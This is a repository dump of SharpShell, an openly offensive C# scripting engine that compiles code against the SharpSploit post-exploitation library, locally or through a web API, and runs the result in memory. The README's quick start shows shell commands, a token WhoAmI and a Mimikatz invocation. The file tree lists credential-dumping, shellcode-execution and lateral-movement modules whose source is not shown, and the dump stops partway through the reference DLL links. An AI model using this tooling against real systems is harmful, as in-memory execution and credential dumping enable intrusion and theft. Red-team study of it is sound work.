├── .gitignore ├── LICENSE ├── README.md ├── SharpShell.API.SharpShell ├── Compiler.cs ├── Properties │ └── AssemblyInfo.cs ├── SharpShell.API.SharpShell.csproj └── SharpShell.cs ├── SharpShell.API ├── Controllers │ └── SharpShellController.cs ├── Data │ ├── References │ │ ├── net35 │ │ │ ├── System.Core.dll │ │ │ ├── System.DirectoryServices.dll │ │ │ ├── System.IdentityModel.dll │ │ │ ├── System.Management.Automation.dll │ │ │ ├── System.Management.dll │ │ │ ├── System.dll │ │ │ └── mscorlib.dll │ │ ├── net40 │ │ │ ├── System.Core.dll │ │ │ ├── System.DirectoryServices.dll │ │ │ ├── System.IdentityModel.dll │ │ │ ├── System.Management.Automation.dll │ │ │ ├── System.Management.dll │ │ │ ├── System.dll │ │ │ └── mscorlib.dll │ │ └── references.yml │ ├── Resources │ │ ├── powerkatz_x64.dll │ │ ├── powerkatz_x64.dll.comp │ │ ├── powerkatz_x86.dll │ │ ├── powerkatz_x86.dll.comp │ │ └── resources.yml │ └── Source │ │ └── SharpSploit │ │ ├── Credentials │ │ ├── Mimikatz.cs │ │ └── Tokens.cs │ │ ├── Enumeration │ │ ├── Domain.cs │ │ ├── Host.cs │ │ └── Network.cs │ │ ├── Execution │ │ ├── Assembly.cs │ │ ├── PE.cs │ │ ├── Shell.cs │ │ ├── ShellCode.cs │ │ └── Win32.cs │ │ ├── Generic │ │ └── Generic.cs │ │ ├── LateralMovement │ │ ├── DCOM.cs │ │ └── WMI.cs │ │ └── Misc │ │ ├── CountdownEvent.cs │ │ └── Utilities.cs ├── Models │ ├── Common.cs │ ├── Compiler.cs │ └── SharpShellContext.cs ├── Properties │ └── launchSettings.json ├── SharpShell.API.csproj ├── SharpShellAPI.cs ├── Startup.cs ├── appsettings.Development.json └── appsettings.json ├── SharpShell.sln └── SharpShell ├── App.config ├── Common.cs ├── Compiler.cs ├── Data ├── References │ ├── net35 │ │ ├── System.Core.dll │ │ ├── System.DirectoryServices.dll │ │ ├── System.IdentityModel.dll │ │ ├── System.Management.Automation.dll │ │ ├── System.Management.dll │ │ ├── System.dll │ │ └── mscorlib.dll │ ├── net40 │ │ ├── System.Core.dll │ │ ├── System.DirectoryServices.dll │ │ ├── System.IdentityModel.dll │ │ ├── 
System.Management.Automation.dll │ │ ├── System.Management.dll │ │ ├── System.dll │ │ └── mscorlib.dll │ └── references.yml ├── Resources │ ├── powerkatz_x64.dll │ ├── powerkatz_x64.dll.comp │ ├── powerkatz_x86.dll │ ├── powerkatz_x86.dll.comp │ └── resources.yml └── Source │ └── SharpSploit │ ├── Credentials │ ├── Mimikatz.cs │ └── Tokens.cs │ ├── Enumeration │ ├── Domain.cs │ ├── Host.cs │ └── Network.cs │ ├── Execution │ ├── Assembly.cs │ ├── PE.cs │ ├── Shell.cs │ ├── ShellCode.cs │ └── Win32.cs │ ├── Generic │ └── Generic.cs │ ├── LateralMovement │ ├── DCOM.cs │ └── WMI.cs │ └── Misc │ ├── CountdownEvent.cs │ └── Utilities.cs ├── Properties └── AssemblyInfo.cs ├── SharpShell.cs ├── SharpShell.csproj └── packages.config /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | 
*.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. 
Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. 
Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2018, Ryan Cobb (@cobbr_io) 2 | 3 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 4 | 5 | 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 6 | 7 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 8 | 9 | 3. 
Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 10 | 11 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpShell 2 | 3 | [SharpShell](https://github.com/cobbr/SharpShell) is a proof-of-concept offensive C# scripting engine that utilizes the [Roslyn](https://github.com/dotnet/roslyn) C# compiler to quickly cross-compile .NET Framework console applications or libraries. 4 | 5 | SharpShell is broken up into three distinct C# projects: 6 | 7 | * **SharpShell** - `SharpShell` is the most straightforward of the three projects. It acts as an interactive shell and scripting engine for C# code compiled against chosen source code, references, and resources. The main caveat with `SharpShell` is that it depends upon .NET Framework 4.6 and 3.5/4.0 being installed on the system. This is because `SharpShell` depends upon the Roslyn API, which requires 4.6, and executes an assembly in memory cross-compiled for your choice of versions 3.5 or 4.0. 
8 | * **SharpShell.API** - `SharpShell.API` and `SharpShell.API.SharpShell` are two projects meant to be used in tandem. To avoid the opsec limitations and .NET Framework 4.6 requirements of `SharpShell`, `SharpShell.API` acts as a web-server that handles the compilation for `SharpShell.API.SharpShell`. `SharpShell.API` is an ASP.NET Core 2.1 application and is cross-platform. 9 | * **SharpShell.API.SharpShell** - `SharpShell.API.SharpShell` provides the same interface as `SharpShell`, but doesn't have the .NET Framework 4.6 requirement. `SharpShell.API.SharpShell` runs on .NET Framework 3.5, but also requires network communication with a `SharpShell.API` server for handling compilation of assemblies. 10 | 11 | ### Intro 12 | 13 | You'll find additional details about the SharpShell project in this [introductory blog post](https://cobbr.io/SharpShell.html). 14 | 15 | ### Quick Start 16 | 17 | Start up the standalone `SharpShell` and execute C# one-liners that compile against [SharpSploit](https://github.com/cobbr/SharpSploit): 18 | 19 | ``` 20 | PS C:\Users\cobbr\Demos\SharpShell\SharpShell\bin\Release> .\SharpShell.exe 21 | SharpShell > Shell.ShellExecute("whoami"); 22 | desktop-f9dq76g\cobbr 23 | 24 | SharpShell > using (Tokens t = new Tokens()) { \ 25 | >>> return t.WhoAmI(); \ 26 | >>> } 27 | DESKTOP-F9DQ76G\cobbr 28 | SharpShell > Mimikatz.Command("coffee"); 29 | 30 | .#####. mimikatz 2.1.1 (x86) built on Oct 22 2018 16:27:15 31 | .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** 32 | ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 33 | ## \ / ## > http://blog.gentilkiwi.com/mimikatz 34 | '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) 35 | '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ 36 | 37 | mimikatz(powershell) # coffee 38 | 39 | ( ( 40 | ) ) 41 | .______. 
42 | | |] 43 | \ / 44 | `----' 45 | 46 | SharpShell > 47 | ``` 48 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/Compiler.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Net; 8 | using System.Text; 9 | using System.IO.Compression; 10 | using System.Collections.Generic; 11 | 12 | namespace SharpShell.API.SharpShell 13 | { 14 | public class APICompiler 15 | { 16 | public enum OutputKind 17 | { 18 | ConsoleApplication = 0, 19 | WindowsApplication = 1, 20 | DynamicallyLinkedLibrary = 2, 21 | NetModule = 3, 22 | WindowsRuntimeMetaData = 4, 23 | WindowsRuntimeApplication = 5 24 | } 25 | 26 | public enum DotNetVersion 27 | { 28 | Net35, 29 | Net40 30 | } 31 | 32 | public enum Platform 33 | { 34 | AnyCpu = 0, 35 | X86 = 1, 36 | X64 =2 37 | } 38 | 39 | public class EmbeddedResource 40 | { 41 | public string Name { get; set; } 42 | public string File { get; set; } 43 | public Platform Platform { get; set; } = Platform.AnyCpu; 44 | public bool Enabled { get; set; } = false; 45 | } 46 | 47 | public class Reference 48 | { 49 | public string File { get; set; } 50 | public DotNetVersion Framework { get; set; } = DotNetVersion.Net35; 51 | public bool Enabled { get; set; } = false; 52 | } 53 | 54 | public class CompilationRequest 55 | { 56 | public string Source { get; set; } = null; 57 | public string SourceDirectory { get; set; } = null; 58 | public string ResourceDirectory { get; set; } = null; 59 | public string ReferenceDirectory { get; set; } = null; 60 | 61 | public DotNetVersion TargetDotNetVersion { get; set; } = DotNetVersion.Net35; 62 | public OutputKind OutputKind { get; set; } = OutputKind.DynamicallyLinkedLibrary; 63 | public Platform Platform { get; set; } = Platform.AnyCpu; 64 | 
public bool Optimize = true; 65 | 66 | public string AssemblyName { get; set; } = null; 67 | public List References { get; set; } = new List(); 68 | public List EmbeddedResources { get; set; } = new List(); 69 | } 70 | 71 | 72 | private string SharpShellURI { get; set; } = ""; 73 | private WebClient client { get; set; } = new WebClient(); 74 | 75 | public APICompiler(string SharpShellURI = "http://localhost:5000/api/SharpShell/compile") 76 | { 77 | this.SharpShellURI = SharpShellURI; 78 | } 79 | 80 | public byte[] Compile(CompilationRequest compilationRequest) 81 | { 82 | this.SetHeaders(); 83 | try 84 | { 85 | return Convert.FromBase64String(client.UploadString(this.SharpShellURI, ToJson(compilationRequest))); 86 | } 87 | catch (WebException e) 88 | { 89 | using (var reader = new StreamReader(e.Response.GetResponseStream())) 90 | { 91 | throw new CompilationException("CompilationException: " + reader.ReadToEnd()); 92 | } 93 | } 94 | 95 | } 96 | 97 | public void SetHeaders() 98 | { 99 | this.client.Proxy = WebRequest.DefaultWebProxy; 100 | this.client.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials; 101 | this.client.Headers.Set("Content-Type", "application/json"); 102 | } 103 | 104 | private static string ToJson(CompilationRequest request) 105 | { 106 | string RequestFormat = 107 | @"{{ 108 | ""source"": ""{0}"", 109 | ""frameworkVersion"": {1}, 110 | ""outputKind"": {2} 111 | }}"; 112 | 113 | return String.Format(RequestFormat, JavaScriptStringEncode(request.Source), request.TargetDotNetVersion.ToString("D"), request.OutputKind.ToString("D")); 114 | } 115 | 116 | // Adapted from https://github.com/mono/mono/blob/master/mcs/class/System.Web/System.Web/HttpUtility.cs 117 | public static string JavaScriptStringEncode(string value) 118 | { 119 | if (String.IsNullOrEmpty(value)) { return String.Empty; } 120 | int len = value.Length; 121 | bool needEncode = false; 122 | char c; 123 | for (int i = 0; i < len; i++) 124 | { 125 | c = value[i]; 126 | if (c >= 
0 && c <= 31 || c == 34 || c == 39 || c == 60 || c == 62 || c == 92) 127 | { 128 | needEncode = true; 129 | break; 130 | } 131 | } 132 | 133 | if (!needEncode) { return value; } 134 | 135 | var sb = new StringBuilder(); 136 | for (int i = 0; i < len; i++) 137 | { 138 | c = value[i]; 139 | if (c >= 0 && c <= 7 || c == 11 || c >= 14 && c <= 31 || c == 39 || c == 60 || c == 62) 140 | sb.AppendFormat("\\u{0:x4}", (int)c); 141 | else switch ((int)c) 142 | { 143 | case 8: 144 | sb.Append("\\b"); 145 | break; 146 | case 9: 147 | sb.Append("\\t"); 148 | break; 149 | case 10: 150 | sb.Append("\\n"); 151 | break; 152 | case 12: 153 | sb.Append("\\f"); 154 | break; 155 | case 13: 156 | sb.Append("\\r"); 157 | break; 158 | case 34: 159 | sb.Append("\\\""); 160 | break; 161 | case 92: 162 | sb.Append("\\\\"); 163 | break; 164 | default: 165 | sb.Append(c); 166 | break; 167 | } 168 | } 169 | return sb.ToString(); 170 | } 171 | 172 | private static byte[] Compress(byte[] bytes) 173 | { 174 | byte[] compressedILBytes; 175 | using (MemoryStream memoryStream = new MemoryStream()) 176 | { 177 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 178 | { 179 | deflateStream.Write(bytes, 0, bytes.Length); 180 | } 181 | compressedILBytes = memoryStream.ToArray(); 182 | } 183 | return compressedILBytes; 184 | } 185 | } 186 | 187 | public class CompilationException : Exception 188 | { 189 | public CompilationException() 190 | { 191 | 192 | } 193 | 194 | public CompilationException(string message) : base(message) 195 | { 196 | 197 | } 198 | 199 | public CompilationException(string message, Exception inner) : base(message, inner) 200 | { 201 | 202 | } 203 | } 204 | } 205 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using 
System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpSploit.API.SharpShell")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSploit.API.SharpShell")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("b84548dc-d926-4b39-8293-fa0bdef34d49")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/SharpShell.API.SharpShell.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {B84548DC-D926-4B39-8293-FA0BDEF34D49} 8 | Exe 9 | SharpShell.API.SharpShell 10 | SharpShell.API.SharpShell 11 | v3.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | 
bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /SharpShell.API.SharpShell/SharpShell.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpShell.API.SharpShell 11 | { 12 | class SharpShell 13 | { 14 | public static string WrapperFunctionFormat = 15 | @"using System; 16 | using System.IO; 17 | using System.Linq; 18 | using System.Text; 19 | using System.Security; 20 | using System.Security.Principal; 21 | using System.Collections.Generic; 22 | {0} 23 | 24 | using SharpSploit.Credentials; 25 | using SharpSploit.Enumeration; 26 | using SharpSploit.Execution; 27 | using SharpSploit.Generic; 28 | using SharpSploit.Misc; 29 | 30 | public static class {1} 31 | {{ 32 | public static object Execute() 33 | {{ 34 | {2} 35 | }} 36 | }} 37 | "; 38 | 39 | static void Main(string[] args) 40 | { 41 | bool printPrompt = true; 42 | List UsingImports = new List(); 43 | List lines = new List(); 44 | APICompiler compiler = new APICompiler(args.Length > 0 ? 
args[0] : "http://localhost:5000/api/SharpShell/compile"); 45 | while (true) 46 | { 47 | // Display Prompt 48 | if (printPrompt) 49 | { 50 | Console.Write("SharpShell > "); 51 | } 52 | else 53 | { 54 | Console.Write(">>> "); 55 | } 56 | 57 | // Read Input 58 | string line = Console.ReadLine(); 59 | 60 | // SharpShell Special Commands 61 | if (line.Trim().ToLower() == "exit" || line.Trim().ToLower() == "quit") 62 | { 63 | return; 64 | } 65 | else if (line.Trim() == "") 66 | { 67 | continue; 68 | } 69 | else if (line.Trim().EndsWith("\\")) 70 | { 71 | printPrompt = false; 72 | lines.Add(line.TrimEnd('\\')); 73 | continue; 74 | } 75 | else if (line.Trim().StartsWith("using ") && line.Trim().Split(' ').Length == 2 && line.Trim().EndsWith(";")) 76 | { 77 | Console.WriteLine("Import:\"" + line.Trim() + "\" now being used."); 78 | UsingImports.Add(line.Trim()); 79 | continue; 80 | } 81 | 82 | try 83 | { 84 | // Concatenation 85 | printPrompt = true; 86 | string source = String.Join(Environment.NewLine, lines.ToArray()); 87 | lines.Clear(); 88 | source = source + Environment.NewLine + line; 89 | if (!source.Contains("return ")) 90 | { 91 | source = "return " + source; 92 | } 93 | 94 | // Compilation 95 | string ClassName = RandomString(); 96 | byte[] assemblyBytes = compiler.Compile(new APICompiler.CompilationRequest 97 | { 98 | Source = String.Format(WrapperFunctionFormat, String.Join(Environment.NewLine, UsingImports.ToArray()), ClassName, source), 99 | AssemblyName = "SharpShell", 100 | Optimize = true, 101 | TargetDotNetVersion = APICompiler.DotNetVersion.Net35, 102 | OutputKind = APICompiler.OutputKind.DynamicallyLinkedLibrary, 103 | Platform = APICompiler.Platform.AnyCpu 104 | }); 105 | 106 | // Execution 107 | Assembly assembly = Assembly.Load(assemblyBytes); 108 | object result = assembly.GetType(ClassName).GetMethod("Execute").Invoke(null, null); 109 | Console.WriteLine(result.ToString()); 110 | } 111 | catch (CompilationException e) 112 | { 113 | 
Console.Error.WriteLine(e.Message); 114 | } 115 | catch (Exception e) 116 | { 117 | Console.Error.WriteLine("RuntimeException: " + e.Message + e.StackTrace); 118 | } 119 | } 120 | } 121 | 122 | private static Random random = new Random(); 123 | private static string RandomString() 124 | { 125 | const string alphachars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 126 | const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; 127 | return alphachars[random.Next(alphachars.Length)] + new string(Enumerable.Repeat(chars, random.Next(10, 30)).Select(s => s[random.Next(s.Length)]).ToArray()); 128 | } 129 | } 130 | } 131 | -------------------------------------------------------------------------------- /SharpShell.API/Controllers/SharpShellController.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Linq; 8 | using System.Collections.Generic; 9 | using Microsoft.AspNetCore.Mvc; 10 | 11 | using YamlDotNet.Serialization; 12 | using SharpShell.API.Models; 13 | 14 | namespace SharpShell.API.Controllers 15 | { 16 | [Route("api/[controller]")] 17 | [ApiController] 18 | public class SharpShellController : ControllerBase 19 | { 20 | private readonly SharpShellContext _context; 21 | 22 | public SharpShellController(SharpShellContext context) 23 | { 24 | this._context = context; 25 | } 26 | 27 | // POST api/sharpshell/compile 28 | [HttpPost("compile")] 29 | public ActionResult PostCompile([FromBody] Compiler.CompilationRequest request = default(Compiler.CompilationRequest)) 30 | { 31 | request.SourceDirectory = Common.SharpShellSourceDirectory; 32 | request.ResourceDirectory = Common.SharpShellResourcesDirectory; 33 | request.ReferenceDirectory = Common.SharpShellReferencesDirectory; 34 | using (TextReader reader = 
System.IO.File.OpenText(Common.SharpShellReferencesConfig)) 35 | { 36 | var deserializer = new DeserializerBuilder().Build(); 37 | request.References = deserializer.Deserialize>(reader) 38 | .Where(R => R.Framework == request.TargetDotNetVersion) 39 | .Where(R => R.Enabled) 40 | .ToList(); 41 | } 42 | using (TextReader reader = System.IO.File.OpenText(Common.SharpShellResourcesConfig)) 43 | { 44 | var deserializer = new DeserializerBuilder().Build(); 45 | request.EmbeddedResources = deserializer.Deserialize>(reader) 46 | .Where(ER => ER.Enabled) 47 | .ToList(); 48 | } 49 | try 50 | { 51 | return Convert.ToBase64String(Compiler.Compile(request)); 52 | } 53 | catch (CompilerException e) 54 | { 55 | return BadRequest(e.Message); 56 | } 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.Core.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.Core.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.DirectoryServices.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.IdentityModel.dll -------------------------------------------------------------------------------- 
/SharpShell.API/Data/References/net35/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.Management.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/System.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net35/mscorlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net35/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.Core.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.Core.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.DirectoryServices.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.IdentityModel.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell.API/Data/References/net40/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell.API/Data/References/net40/System.Management.dll: -------------------------------------------------------------------------------- 